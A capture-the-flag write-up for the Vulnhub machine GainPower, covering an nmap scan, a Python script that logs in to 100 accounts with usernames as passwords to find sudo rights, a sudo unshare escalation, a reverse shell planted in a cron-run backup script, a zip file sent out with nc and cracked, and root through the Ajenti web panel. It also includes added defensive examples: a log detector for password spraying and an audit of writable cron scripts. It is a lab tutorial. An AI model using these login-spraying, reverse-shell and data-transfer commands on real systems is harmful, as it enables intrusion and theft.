[VLN] GainPower

Today we are going to hack the Vulnhub machine called GainPower. You can download it from the following link: GainPower

Enumeration


We start with an nmap scan to see which ports are open.

sml@Cassandra:~$ nmap -A -p- 192.168.1.34
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-30 11:53 CEST
Nmap scan report for 192.168.1.34
Host is up (0.0016s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 88:41:61:11:e1:1f:18:7d:d6:0c:38:29:25:79:16:2c (RSA)
|   256 18:c5:fd:ce:cd:2b:92:f8:d9:17:17:21:24:9d:67:df (ECDSA)
|_  256 84:c5:14:e4:e9:33:21:41:6a:92:72:b9:a7:33:1a:ea (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS)
|_http-title: Watch shop | eCommers
8000/tcp open  http    Ajenti http control panel
|_http-title: Ajenti

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.79 seconds
We connect over ssh to see whether it shows us anything.

sml@Cassandra:~/tools$ ssh holi@192.168.1.34
Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :) 

   ___      _        ___                    
  / __|__ _(_)_ _   | _ \_____ __ _____ _ _ 
 | (_ / _` | | ' \  |  _/ _ \ V  V / -_) '_|
  \___\__,_|_|_||_| |_| \___/\_/\_/\___|_|  
                                            

I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : 
employee1 employee2 ... ... ... so on ;)

I already told the format of password of everyone in the yesterday's metting.

Now i have configured everything. My request is to everyone to Complete 
assignments on time 

btw one of my employee have sudo powers because he is my favourite 

NOTE : "This message will automatically removed after 2 days" 
                                                                - BOSS
holi@192.168.1.34's password: 
We can read that the users are of the form employee1, employee2, etc. It also says that everyone already knows the password format, and that one of the users has "sudo" powers. Knowing this, and after some trying, we can log in using the same password as the username, that is, we can log in with employee1/employee1, employee2/employee2 and so on. We log in as employee1 to take a first look.

Low Shell



sml@Cassandra:~$ ssh employee1@192.168.1.34
Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :) 

   ___      _        ___                    
  / __|__ _(_)_ _   | _ \_____ __ _____ _ _ 
 | (_ / _` | | ' \  |  _/ _ \ V  V / -_) '_|
  \___\__,_|_|_||_| |_| \___/\_/\_/\___|_|  
                                            

I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : 
employee1 employee2 ... ... ... so on ;)

I already told the format of password of everyone in the yesterday's metting.

Now i have configured everything. My request is to everyone to Complete 
assignments on time 

btw one of my employee have sudo powers because he is my favourite 

NOTE : "This message will automatically removed after 2 days" 
                                                                - BOSS
 
employee1@192.168.1.34's password: 
Last login: Tue Jun 30 18:01:37 2020 from cassandra.home
[employee1@localhost ~]$
We know that one employee has sudo privileges, so let's see how many employees there are.

[employee1@localhost home]$ cat /etc/passwd | grep employ
---SNIP---
employee16:x:1015:1015::/home/employee16:/bin/bash
employee51:x:1050:1050::/home/employee51:/bin/bash
employee52:x:1051:1051::/home/employee52:/bin/bash
employee97:x:1096:1096::/home/employee97:/bin/bash
employee98:x:1097:1097::/home/employee98:/bin/bash
employee99:x:1098:1098::/home/employee99:/bin/bash
employee100:x:1099:1099::/home/employee100:/bin/bash
---SNIP---
We see there are 100 of them... We prepare a Python script that logs in as user employeeX and runs sudo to see whether that user has permissions or gets an error. The script is the following:

#!/usr/bin/env python3
import paramiko


def fuckme(seraeste):
        # On this box the password is the same string as the username
        print(seraeste)
        l_password = seraeste
        l_host = "192.168.1.34"  # MODIFY IP
        l_user = seraeste
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        ssh.connect(l_host, username=l_user, password=l_password)
        transport = ssh.get_transport()
        session = transport.open_session()
        session.set_combine_stderr(True)
        session.get_pty()  # sudo wants a tty to prompt for the password

        session.exec_command("sudo -l")
        stdin = session.makefile('wb', -1)
        stdout = session.makefile('rb', -1)
        # Answer the "[sudo] password for ..." prompt (channel files take bytes)
        stdin.write((l_password + '\n').encode())
        stdin.flush()
        for line in stdout.read().decode(errors='replace').splitlines():
                print('host: %s: %s' % (l_host, line))
        ssh.close()


for x in range(1, 101):
        yeah = "employee" + str(x)
        fuckme(yeah)
We run the script...

sml@Cassandra:~$ python g.py
---SNIP---
host: 192.168.1.34: employee63
host: 192.168.1.34: [sudo] password for employee63: 
host: 192.168.1.34: Sorry, user employee63 may not run sudo on localhost.
employee64
host: 192.168.1.34: employee64
host: 192.168.1.34: [sudo] password for employee64: 
host: 192.168.1.34: Matching Defaults entries for employee64 on localhost:
host: 192.168.1.34:     !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
host: 192.168.1.34:     env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
host: 192.168.1.34:     env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
host: 192.168.1.34:     env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
host: 192.168.1.34:     env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
host: 192.168.1.34:     env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
host: 192.168.1.34:     secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
host: 192.168.1.34: 
host: 192.168.1.34: User employee64 may run the following commands on localhost:
host: 192.168.1.34:     (programmer) /usr/bin/unshare
employee65
host: 192.168.1.34: employee65
host: 192.168.1.34: [sudo] password for employee65: 
host: 192.168.1.34: Sorry, user employee65 may not run sudo on localhost.
---SNIP---
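Seen from the server side, the loop above leaves a very recognisable trace in /var/log/secure: a single source address logging in as one account after another, each login followed immediately by a sudo probe. The following detector is an added example and not part of the original writeup; it runs over constructed log lines in CentOS sshd/sudo syslog style (hostnames, PIDs, ports and timestamps are made up) and reports sources that authenticated as more distinct accounts than one person plausibly owns.

```python
#!/usr/bin/env python3
"""Spot one source address logging in as many accounts and probing sudo."""
import re
from collections import defaultdict

# Constructed lines in CentOS /var/log/secure style; the hostname, PIDs,
# ports and timestamps are made up for this example.
SAMPLE_LOG = """\
Jun 30 08:05:01 localhost sshd[20411]: Accepted password for employee63 from 192.168.1.148 port 50122 ssh2
Jun 30 08:05:01 localhost sudo: employee63 : user NOT in sudoers ; TTY=pts/1 ; PWD=/home/employee63 ; USER=root ; COMMAND=list
Jun 30 08:05:02 localhost sshd[20415]: Accepted password for employee64 from 192.168.1.148 port 50124 ssh2
Jun 30 08:05:02 localhost sudo: employee64 : TTY=pts/1 ; PWD=/home/employee64 ; USER=root ; COMMAND=list
Jun 30 08:05:03 localhost sshd[20419]: Accepted password for employee65 from 192.168.1.148 port 50126 ssh2
Jun 30 08:05:03 localhost sudo: employee65 : user NOT in sudoers ; TTY=pts/1 ; PWD=/home/employee65 ; USER=root ; COMMAND=list
Jun 30 08:05:27 localhost sshd[20423]: Failed password for employee64 from 192.168.1.148 port 50130 ssh2
Jun 30 09:12:44 localhost sshd[20990]: Accepted password for employee1 from 192.168.1.77 port 41000 ssh2
"""

SSH_ACCEPT = re.compile(r"sshd\[\d+\]: Accepted \w+ for (?P<user>\S+) from (?P<src>\S+)")
SSH_FAIL = re.compile(r"sshd\[\d+\]: Failed \w+ for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)")
SUDO_DENIED = re.compile(r"sudo:\s+(?P<user>\S+) : user NOT in sudoers")


def summarize(lines):
    """Per source address: distinct accounts that logged in, failed logins,
    and sudo refusals attributed to those accounts."""
    stats = defaultdict(lambda: {"users": set(), "failed": 0, "sudo_denied": 0})
    last_src = {}  # user -> source address of that user's most recent login
    for line in lines:
        m = SSH_ACCEPT.search(line)
        if m:
            stats[m["src"]]["users"].add(m["user"])
            last_src[m["user"]] = m["src"]
            continue
        m = SSH_FAIL.search(line)
        if m:
            stats[m["src"]]["failed"] += 1
            continue
        m = SUDO_DENIED.search(line)
        if m and m["user"] in last_src:
            # sudo lines carry no address, so attribute them to the login source
            stats[last_src[m["user"]]]["sudo_denied"] += 1
    return stats


def spraying_sources(lines, max_accounts=2):
    """Sources that logged in as more than max_accounts distinct users.
    The threshold is a site choice; one person rarely owns more than a couple."""
    return sorted(src for src, s in summarize(lines).items()
                  if len(s["users"]) > max_accounts)


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    stats = summarize(lines)
    for src in spraying_sources(lines):
        s = stats[src]
        print(f"{src}: {len(s['users'])} accounts, {s['sudo_denied']} sudo refusals, "
              f"{s['failed']} failed logins")
```

On the sample data only 192.168.1.148 is reported: three accounts in three seconds, two of them refused by sudo. The second signal is cheap to alert on by itself, since a legitimate user rarely runs sudo from an account that has never been granted it.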
We see that user employee64 can use sudo! We log in with employee64/employee64.

sml@Cassandra:~/tools$ ssh employee64@192.168.1.34
Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :) 

   ___      _        ___                    
  / __|__ _(_)_ _   | _ \_____ __ _____ _ _ 
 | (_ / _` | | ' \  |  _/ _ \ V  V / -_) '_|
  \___\__,_|_|_||_| |_| \___/\_/\_/\___|_|  
                                            

I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : 
employee1 employee2 ... ... ... so on ;)

I already told the format of password of everyone in the yesterday's metting.

Now i have configured everything. My request is to everyone to Complete 
assignments on time 

btw one of my employee have sudo powers because he is my favourite 

NOTE : "This message will automatically removed after 2 days" 
                                                                - BOSS
employee64@192.168.1.34's password: 
Last failed login: Tue Jun 30 08:05:27 EDT 2020 from cassandra.home on ssh:notty
There were 677 failed login attempts since the last successful login.
Last login: Mon May 18 08:59:41 2020
[employee64@localhost ~]$
Once logged in, we run sudo -l to see what we can do.

[employee64@localhost ~]$ sudo -l
Matching Defaults entries for employee64 on localhost:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User employee64 may run the following commands on localhost:
    (programmer) /usr/bin/unshare
We can run unshare as the user programmer. We take advantage of it to get a shell as "programmer".

[employee64@localhost ~]$ sudo -u programmer /usr/bin/unshare /bin/bash
bash-4.2$ id
uid=1182(programmer) gid=1184(prome) grupos=1184(prome) contexto=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
Now that we are programmer, we look around the system a bit more.

bash-4.2$ groups
prome
bash-4.2$ find / -group prome 2>/dev/null
/proc/20325/timers
/proc/20325/patch_state
/tmp/back.txt
/home/vanshal
/media/programmer
/media/programmer/scripts
/media/programmer/scripts/backup.sh
We see that we belong to the "prome" group and that this group can modify the script /media/programmer/scripts/backup.sh. Running pspy64 we see that there is a scheduled task that runs the script as user vanshal (UID 1183).

2020/06/30 08:55:01 CMD: UID=1183 PID=20604  | /bin/bash /media/programmer/scripts/backup.sh
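The weakness here is a scheduled script that one account executes while another group can write to it. A routine check for that condition is simple to write; the following is an added example (not from the writeup) that inspects a script's mode and owner against the account that runs it and also looks at the parent directory, since write access there allows the file to be replaced outright. The demo builds the same layout as the box in a temporary directory with a made-up script body and modes we set ourselves.

```python
#!/usr/bin/env python3
"""Check that a script executed from cron is writable only by its runner."""
import os
import stat
import tempfile


def audit_script(path, runner_uid):
    """Return a list of problems with `path` being run by uid `runner_uid`."""
    problems = []
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return [f"{path}: missing (anyone who can write the directory could create it)"]
    if st.st_mode & stat.S_IWGRP:
        problems.append(f"{path}: group-writable (gid {st.st_gid})")
    if st.st_mode & stat.S_IWOTH:
        problems.append(f"{path}: world-writable")
    # Root-owned scripts run by other users are the normal cron pattern;
    # anything else means a third party controls what the runner executes.
    if st.st_uid not in (0, runner_uid):
        problems.append(f"{path}: owned by uid {st.st_uid} but runs as uid {runner_uid}")
    # The directory matters too: write access there lets the file be replaced.
    parent = os.path.dirname(os.path.abspath(path))
    pst = os.stat(parent)
    if pst.st_mode & (stat.S_IWGRP | stat.S_IWOTH) and not pst.st_mode & stat.S_ISVTX:
        problems.append(f"{parent}: directory writable by group/other")
    return problems


def demo():
    """Constructed scenario mirroring the box: scripts/backup.sh, first
    group-writable, then restricted to its owner. Returns both audit results."""
    with tempfile.TemporaryDirectory() as root:
        scripts = os.path.join(root, "scripts")
        os.mkdir(scripts)
        os.chmod(scripts, 0o755)
        script = os.path.join(scripts, "backup.sh")
        with open(script, "w") as f:
            f.write("#!/bin/bash\necho backup\n")  # made-up body
        me = os.getuid()  # stand-in for the cron runner's uid
        os.chmod(script, 0o664)  # group-writable, as on the box
        weak = audit_script(script, me)
        os.chmod(script, 0o744)  # owner-only write
        fixed = audit_script(script, me)
        return weak, fixed


if __name__ == "__main__":
    weak, fixed = demo()
    print("before:", weak or "clean")
    print("after: ", fixed or "clean")
```

In a real deployment the runner uid comes from the crontab entry (the user field in /etc/cron.d files or the owner of a per-user crontab) and the check is run over every script referenced there.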
The machine does not have nc, so we download it from our machine into its /tmp.

bash-4.2$ wget http://192.168.1.148/nc
--2020-06-30 08:57:03--  http://192.168.1.148/nc
Conectando con 192.168.1.148:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 35520 (35K) [application/octet-stream]
Grabando a: “nc”

100%[===========================================================================================================================>] 35.520      --.-K/s   en 0s  

2020-06-30 08:57:03 (574 MB/s) - “nc” guardado [35520/35520]

bash-4.2$ chmod +x nc
We modify the script to get a reverse shell.

bash-4.2$ vi /media/programmer/scripts/backup.sh
# we add the line: /tmp/nc -e /bin/bash 192.168.1.148 5555
We set nc listening.

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
And after waiting...

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.34] 33524
id
uid=1183(vanshal) gid=1184(prome) groups=1184(prome) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
python -c 'import pty; pty.spawn("/bin/bash")'
[vanshal@localhost ~]$

local.txt

[vanshal@localhost ~]$ ls
local.txt  secret.zip
[vanshal@localhost ~]$ cat local.txt
You successfully owned the user of this box :-) Best of Luck
for the root
flag: 5c2a29d7b95868da9e503502f301e8dd
Twitter : VanshalG
We see there is a file called secret.zip. We use nc to transfer it to our machine so we can crack it. On our machine we run:

sml@Cassandra:~$ nc -lp 1234 > secret.zip
On the victim:

[vanshal@localhost ~]$ /tmp/nc -w 3 192.168.1.148 1234 < secret.zip
Once we have the .zip file, we crack the password:

sml@Cassandra:~$ fcrackzip -v -u -D -p rockyou.txt secret.zip
found file 'Mypasswords.txt', (size cp/uc    243/   257, flags 9, chk 7f46)
PASSWORD FOUND!!!!: pw == 81237900
We unzip the file...

sml@Cassandra:~$ unzip secret.zip
Archive:  secret.zip
[secret.zip] Mypasswords.txt password: 
  inflating: Mypasswords.txt
We look at the contents.

sml@Cassandra:~$ cat Mypasswords.txt 
aTQ!vYxQUh3$&uaN3p%@_ax#Ab2XNZ!5$rFh$@bDMyxt#&Q2L&4+DvDT?A!MPKK9sFq-V8_d$5gQLKyK
hf-4&S=_m^Cx?bZYf8Bv%%*H^GcvDc4ayfPk^HWs8bnD%Ayk3$5WP6_K?a6_%MF&e-DS2ZZ$m93BL3CY
!huQDM2-JZcMSMKT8K*Z7zLPGATU7JP&x#JtaZHAbM^%$TK%C3ubXV4#e87M6P-puXTTMbzuP5y4qX6U
zd%ed8Ux_vMX=pCB

Privilege Escalation


We see a string that could be a hash... but it is not :) We go to http://192.168.1.34:8000 and use root/(the contents of Mypasswords.txt) as credentials. Yes... that was the password :) On the left-hand side we go to "Terminal", then in the box at the top right we type "/bin/bash", and finally we click the "Run" button and a "web" terminal opens as root.

root.txt



[root@localhost root]# ls
proof.txt
[root@localhost root]# cat proof.txt
You successfully owned the root of this box :-)
Flag: eb2e174c3883ff6b5fd871167795b4d6
Twitter : VanshalG

End


And with this we are root on the machine :)